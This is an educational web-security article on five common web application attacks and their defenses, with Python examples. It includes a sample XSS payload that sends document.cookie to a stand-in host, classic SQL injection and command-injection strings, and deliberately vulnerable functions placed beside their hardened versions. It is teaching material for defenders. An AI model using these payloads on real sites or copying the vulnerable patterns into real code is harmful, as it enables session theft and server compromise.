Common Web Application Attacks
15 Mar

Most Common Web Application Attacks and How to Defend Against Them

The modern information age has moved almost every physical business onto an online platform, and the most popular way to do so is a web application. The internet is an inexpensive, easy and fast medium for communicating and sharing information, but that convenience brings a number of serious cyber threats with it. According to Akamai's State of the Internet Q4 2017 report, total web application attacks rose 10 percent compared with Q4 2016. [1] Verizon's DBIR for 2016 and 2017 backs this up: web application attacks were the most common pattern behind confirmed security breaches. Over the past several years web application attacks have also been observed to be noisy, with an attack-to-breach ratio of roughly 100,000 to 1, because malicious hackers have shifted to automation to find the weak spots in web applications. [2]

What is a Web Application?

A web application is a client-server program that uses a web browser and web technology to let visitors store and retrieve data in a database over the internet. Websites that keep personal details, credit/debit card numbers and similar data for immediate and recurring use do so through a web application. Server-side code (for example PHP or ASP.NET) handles the data stored in the database, while client-side code (HTML and JavaScript) renders the interface in the browser. Webmail, login forms, content management systems and shopping carts are all examples of web applications.

To understand web application attacks it helps to look at the basic workflow. Web applications can be static or dynamic, which determines whether a request needs server-side processing. A dynamic web application generally needs a web server to handle client requests, an application server to process the tasks the user asks for, and a database to store the user's data. The request flow therefore runs from the browser to the web server, on to the application server and then to the database, and the response travels back the same way. [3]

Most Common Web App Attacks and Their Defenses

tCell's Security Report for In-Production Web Applications, Q2 2018, lists five common web application attacks, [2] which are –

1. Cross-Site Scripting (XSS)

Cross-site scripting is one of the most frequent web application attacks. In cross-site scripting (XSS), the attacker gets untrusted JavaScript into a page that the application serves to other users, either by storing it in the application (for example through a comment field, known as stored XSS) or by luring the victim into clicking a crafted URL whose parameter the application reflects into the page (reflected XSS). The script runs in the victim's browser with the same privileges as the site's own code, so it can read session cookies and page content, perform actions on the user's behalf, and rewrite the page to redirect authorized users to scam sites.

XSS vulnerabilities can be addressed in three complementary ways –

  • Escaping User Inputs

Data received by a web application is encoded before it is written into a page for the end user. This is referred to as escaping, or output encoding. Rather than censoring the input, escaping converts characters that have meaning in HTML (mainly '<', '>', '&' and quotes) into entities such as &lt; and &gt;, so the browser renders them as text instead of interpreting them as markup or script. The encoding has to match the context the data lands in: the HTML body, an attribute value, a JavaScript string and a URL each need different escaping. If your pages never let users add their own markup, escaping everything is straightforward. If your application has comment boxes or is itself a forum, you have fewer choices; in that case decide carefully which HTML elements you want to allow and treat everything else as text.

  • Input Validation

Input validation ensures that the web application only accepts data of the expected shape, keeping untrusted or malicious data away from the database, the application and other users' personal data. Allowlisting (whitelisting) is usually discussed in the context of SQL injection, but accepting only known-good characters for fields such as usernames, phone numbers or postcodes removes most XSS payloads too. Trusted websites that refuse special characters in certain text fields are applying exactly this kind of validation. Validation is a first line of defense rather than a replacement for output encoding, because many fields legitimately contain characters such as '<' and quotes.

  • Sanitizing User Input

Data sanitization modifies the input so that only valid, allowed content remains. It is the right tool when users must be able to submit HTML markup, such as rich-text forum posts: an HTML sanitizer parses the input, keeps an allowlist of harmless elements and attributes (for example <b>, <i> and <a> with an http or https link) and strips everything else, including <script> elements, event-handler attributes such as onerror, and javascript: URLs. Where user data is written into an HTML attribute, always enclose the attribute value in double quotes and encode any quotes in the data, so the input cannot break out of the attribute. Converting invalid input into a valid form ensures that the received data cannot harm your web application or database.

None of these three methods is enough on its own. Implemented together, they provide a solid defense against XSS attacks.
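The three defenses side by side, as an added Python example that is not code from the original article: a comment-rendering function with and without output encoding, attribute-context encoding, an allowlist validator for a username field, and a small allowlist HTML sanitizer built on the standard library's html.parser. The payload string, the tag allowlist and the function names are assumptions made for the example; a production application would use its framework's auto-escaping templates and a maintained sanitizer library rather than a hand-rolled one.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input: the kind of payload an attacker types into a comment box.
ATTACK_COMMENT = '<img src=x onerror="fetch(\'http://evil.example/?c=\'+document.cookie)">'


def render_comment_vulnerable(comment: str) -> str:
    """Inserts the comment verbatim, so the browser evaluates the onerror handler."""
    return f'<p class="comment">{comment}</p>'


def render_comment_escaped(comment: str) -> str:
    """Escaping (output encoding) for the HTML body context: <, >, &, " and '
    become entities, and the browser renders the payload as harmless text."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_title_attribute(value: str) -> str:
    """Attribute context: the value is quoted AND quotes inside it are encoded,
    so the input cannot close the attribute and start an event handler."""
    return f'<a title="{html.escape(value, quote=True)}">link</a>'


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def validate_username(value: str) -> bool:
    """Allowlist validation: a field with a known shape rejects everything else."""
    return USERNAME_RE.fullmatch(value) is not None


class _AllowlistSanitizer(HTMLParser):
    """Sanitization for rich-text fields: keep a few harmless elements, drop the rest."""

    ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}   # assumed allowlist
    ALLOWED_ATTRS = {"a": {"href"}}
    SAFE_SCHEMES = ("http://", "https://", "mailto:")

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.ALLOWED_TAGS:
            return  # <script>, <img>, <iframe>, ... are dropped entirely
        parts = [tag]
        for name, value in attrs:
            if name not in self.ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # no onerror=, onclick=, style=, ...
            if name == "href" and not value.strip().lower().startswith(self.SAFE_SCHEMES):
                continue  # blocks javascript: and data: URLs
            parts.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> becomes <br>, no stray closing tag

    def handle_endtag(self, tag):
        if tag in self.ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))  # text content is always encoded


def sanitize_html(fragment: str) -> str:
    """Returns the fragment with only allowlisted markup; everything else becomes text."""
    parser = _AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Note that the sanitizer turns the body of a dropped <script> element into plain escaped text rather than silently deleting it, which is the safe direction: nothing the attacker supplied is ever emitted as markup unless it is on the allowlist.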

2. SQL Injection (SQLi)

In this web application attack, hackers inject malicious SQL into entry fields so that it is executed by the backend database. It is found in data-driven applications, and it occurs whenever the application builds a SQL statement by concatenating user input into the query text instead of passing the input as a bound parameter. With it, perpetrators can read, alter or delete existing data and create false identities, for example by logging in as an administrator of the application without knowing the password.

The basic defense is to never build SQL statements from raw input: use parameterized queries (prepared statements) or an ORM that does so for every input (text fields, comment boxes, URL parameters, cookies and headers alike), and run the application with a database account that has only the privileges it needs. A web application firewall that filters known SQL injection patterns out of the traffic adds a useful but bypassable extra layer; it should not be the only control.
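A vulnerable login query beside its parameterized form, as an added Python example that is not code from the original article. It uses an in-memory SQLite table constructed for the example (with plaintext passwords purely as a stand-in; real applications store password hashes); the table layout, the function names and the two payloads are assumptions.

```python
import sqlite3


def seed_db() -> sqlite3.Connection:
    """Constructed in-memory user store standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        [("admin", "s3cret-admin", 1), ("alice", "alice-pw", 0), ("bob", "bob-pw", 0)],
    )
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = (
        "SELECT username, is_admin FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterized query: the driver sends the values separately from the
    statement, so a quote in the input is just a quote in the data."""
    sql = "SELECT username, is_admin FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    """Runs both versions against the same two classic payloads."""
    conn = seed_db()
    tautology = "' OR '1'='1"   # turns the WHERE clause into one that is always true
    comment_out = "admin' --"   # ends the string and comments out the password check
    return {
        "vuln_tautology": login_vulnerable(conn, tautology, tautology),  # every row
        "vuln_comment": login_vulnerable(conn, comment_out, "anything"),  # admin, no password
        "safe_tautology": login_safe(conn, tautology, tautology),        # no such user
        "safe_comment": login_safe(conn, comment_out, "anything"),       # no such user
        "safe_legit": login_safe(conn, "alice", "alice-pw"),
    }
```

The vulnerable version returns all three users for the tautology payload and the admin row for the comment payload; the parameterized version returns nothing for either, because the database looks for a user literally named `' OR '1'='1`.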

3. Automated Threats

An automated threat is a computer security threat in the form of software engineered to perform a large volume of repetitive tasks against a web application, typically using automation tools such as internet bots.

Telling a human user apart from an automated client is not trivial, since a bot can send exactly the HTTP requests a browser does; in practice detection relies on signals such as request rate, failed-login volume, client fingerprinting and behaviour no human produces. Real-time bot detection built on such signals can reduce automated threats to a great extent. Account aggregation, carding, scraping and Denial-of-Service (DoS) are a few examples of automated threats.

4. File Path Traversal

File path traversal is also known as directory traversal or backtracking. The objective of this web application attack is to read (or sometimes write) files and directories outside the web root, or outside the directory the application intended to expose. Hackers reach arbitrary files by manipulating file-path parameters with sequences such as ../ (dot-dot-slash), including URL-encoded forms like %2e%2e%2f, or by supplying an absolute path.

This attack is avoided by input validation: accept only a bare filename from an allowlist or a strictly limited character set, or resolve the requested path on the server and verify that the canonical result still lies inside the intended base directory. Keeping the web server and framework patched matters as well, since traversal bugs are also found in server software itself.
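Both checks in code, as an added Python example that is not from the original article: a canonicalize-then-compare resolver for nested paths and a stricter allowlist for bare filenames. The base directory, the filename pattern and the function names are assumptions for the example, and the example assumes a POSIX filesystem.

```python
import os
import re
from urllib.parse import unquote

# Hypothetical directory the application is allowed to serve files from.
BASE_DIR = os.path.realpath("/var/www/app/uploads")

# Bare filename allowlist: must start with a letter or digit, no separators at all.
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


def _fully_decode(value: str, rounds: int = 3) -> str:
    """Undo URL encoding until stable, so %2e%2e%2f and the double-encoded
    %252e%252e%252f are both seen as ../ before the check runs."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_upload_path(user_path: str) -> str:
    """Canonicalize the requested path and prove it stays inside BASE_DIR."""
    decoded = _fully_decode(user_path)
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    # If `decoded` is absolute, os.path.join discards BASE_DIR entirely; realpath
    # then resolves '..' and symlinks, and commonpath catches both ways of escaping.
    candidate = os.path.realpath(os.path.join(BASE_DIR, decoded))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def is_safe_path(user_path: str) -> bool:
    """Boolean form of resolve_upload_path for callers that just want a verdict."""
    try:
        resolve_upload_path(user_path)
        return True
    except ValueError:
        return False


def resolve_upload_name(user_name: str) -> str:
    """Stricter variant for parameters that should only ever be a filename."""
    if not SAFE_NAME_RE.fullmatch(user_name):
        raise ValueError(f"rejected filename: {user_name!r}")
    return os.path.join(BASE_DIR, user_name)
```

Using realpath rather than a string check on "../" also rejects a symlink inside the upload directory that points outside it, which a pattern filter would let through.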

5. Command Injection (CMDi)

Command injection occurs when a web application passes user-supplied input to an operating system shell, for example to run ping, nslookup or a file conversion tool. The attacker appends shell metacharacters such as ;, | or $( ) so that the shell runs extra commands of the attacker's choosing, and those commands execute with the privileges of the web application process, giving the attacker access to critical data and often a foothold on the server. The root cause is a lack of proper input validation combined with building a shell command string out of that input.

Allowlist validation will help you avoid command injection. The most efficient defense is to avoid calling out to the operating system at all where it is not required: use a library function instead, and if an external program really is needed, pass its arguments as a list so that no shell ever parses the input.
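The vulnerable pattern beside the hardened one, as an added Python example that is not from the original article. It uses echo in place of ping or nslookup so that it runs offline and deterministically; the hostname regex and function names are assumptions, and the example assumes a POSIX shell is available.

```python
import re
import subprocess

# Allowlist for a DNS hostname: labels of letters, digits and inner hyphens, joined by dots.
HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def is_valid_hostname(host: str) -> bool:
    """Allowlist validation: anything a shell could misinterpret is simply not a hostname."""
    return len(host) <= 253 and HOSTNAME_RE.fullmatch(host) is not None


def lookup_vulnerable(host: str) -> str:
    """Builds a command string and hands it to a shell: ';', '|', '&&' and
    '$(...)' inside `host` are parsed as shell syntax, not as data."""
    cmd = f"echo Looking up {host}"  # echo stands in for ping/nslookup
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_safe(host: str) -> str:
    """Validates the input, then runs the program with an argv list and no shell,
    so `host` is always exactly one argument however odd it looks."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    # Better still is no process at all, e.g. socket.getaddrinfo(host, None) for a
    # DNS lookup; that option is left out here so the example runs offline.
    return subprocess.run(["echo", "Looking up", host], capture_output=True, text=True).stdout
```

With the payload `example.com; echo INJECTED`, the vulnerable version prints a second line produced by the injected command, while the safe version rejects the input before anything runs; even without the validator, the argv form would only ever print the payload back as literal text.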

Learn Application Security with Us

This is just a glimpse of web application security. If you have a keen interest in acquiring the practical concepts and skills of an application security engineer, join our Certified Application Security Engineer (C|ASE) program. You will have the option to develop your technical skills in web application defense, application design and architecture, input validation, cryptography and a lot more, in either .NET or Java.

Sources:

[1] https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q4-2017-state-of-the-internet-security-report.pdf

[2] https://info.tcell.io/hubfs/DemandGen_Content/Research%20Papers/tCell_wp-stateofsecurity-2018-web.pdf

[3] http://www.extropia.com/tutorials/devenv/intro_to_app_dev.html

Editor's Note:
Reviewed by JoAnne Genevieve Green, Adjunct Professor – Cyber Crimes at the University of Pittsburgh and Dr. Ranjeet Kumar Singh, CEO, Sherlock Institute of Forensic Science India